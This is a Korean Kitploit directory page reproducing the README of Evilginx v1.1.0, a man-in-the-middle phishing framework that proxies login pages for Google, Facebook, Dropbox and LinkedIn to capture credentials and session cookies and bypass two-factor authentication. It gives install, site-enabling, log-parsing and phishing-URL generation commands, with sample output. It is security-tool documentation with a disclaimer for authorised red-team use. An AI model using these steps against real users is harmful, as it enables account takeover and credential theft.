Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
evilginx — 새 버전을 사용하세요: https://github.com/kgretzky/evilginx2 | Kitploit
도구/GitHubGitHub/kgretzky/evilginx
Phishing ToolsWeb Application ExploitationPhishingPenetration TestingSocial EngineeringAuthenticationRed Teaming
GitHubkgretzky/evilginx

evilginx

새 버전을 사용하세요: https://github.com/kgretzky/evilginx2

저장소 보기
1.2k2818년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Evilginx v.1.1.0

Evilginx

이 버전은 구식입니다. 최신 버전을 사용하세요!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx는 피싱 자격 증명과 세션 쿠키를 탈취하기 위한 중간자 공격 프레임워크입니다. 핵심은 Nginx HTTP 서버 위에서 동작하며, proxy_pass와 sub_filter를 사용하여 HTTP 콘텐츠를 프록시하고 수정하면서 클라이언트와 서버 간의 트래픽을 가로챕니다.

작동 방식과 직접 설치하는 방법은 제 블로그에서 확인할 수 있습니다:

첫 번째 글은 현재 약간 구식입니다: Evilginx - Advanced Phishing With Two-factor Authentication Bypass

Evilginx 1.0 업데이트: Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.1 업데이트: Evilginx 1.1 Update

면책 조항

Evilginx가 매우 악의적인 목적으로 사용될 수 있다는 점을 알고 있습니다. 이 작업은 숙련된 공격자가 할 수 있는 일을 단순히 보여주기 위한 것입니다. 방어자는 이러한 공격을 고려하여 방어 체계를 구축하고 이 피싱 방법으로부터 보호할 방법을 찾아야 할 책임이 있습니다. Evilginx는 피싱 대상의 서면 허가를 받은 합법적인 침투 테스트 과제에서만 사용되어야 합니다.

공헌자 명예의 전당

@poweroftrue

설치

Evilginx는 install.sh 설치 스크립트를 제공합니다. 이 스크립트는 Debian wheezy/jessie 머신에서 전체 패키지를 한 번에 설치합니다.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

사용법

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
설정

sites 디렉토리에서 제공되는 Evilginx 템플릿을 사용하여 Nginx 서버와 함께 사용할 사이트 구성을 활성화 또는 비활성화합니다.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

사용 가능한 사이트 구성 템플릿 목록:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

사전 등록된 피싱 도메인 not-really-google.com로 google 피싱 사이트 활성화:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

facebook 피싱 사이트 비활성화:

root@kitploit:~
python evilginx.py setup --disable facebook
파싱

Nginx 로그를 파싱하여 가로챈 로그인 자격 증명과 세션 쿠키를 추출합니다. 로그는 기본적으로 evilginx.py 스크립트가 있는 logs 디렉토리에 저장됩니다. 설정 단계에서 자동 파싱을 활성화한 경우 자동으로 수행할 수 있습니다.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

google 사이트에 대해서만 로그 파싱:

root@kitploit:~
python evilginx.py parse -s google

모든 사이트에 대해 로그 파싱:

root@kitploit:~
python evilginx.py parse -s all
URL 생성

Red Team 평가에서 사용할 수 있는 피싱 URL을 생성합니다.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

성공적인 로그인 후 피해자를 rickroll 동영상으로 리디렉션하는 google 피싱 URL 생성:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
도구 다운로드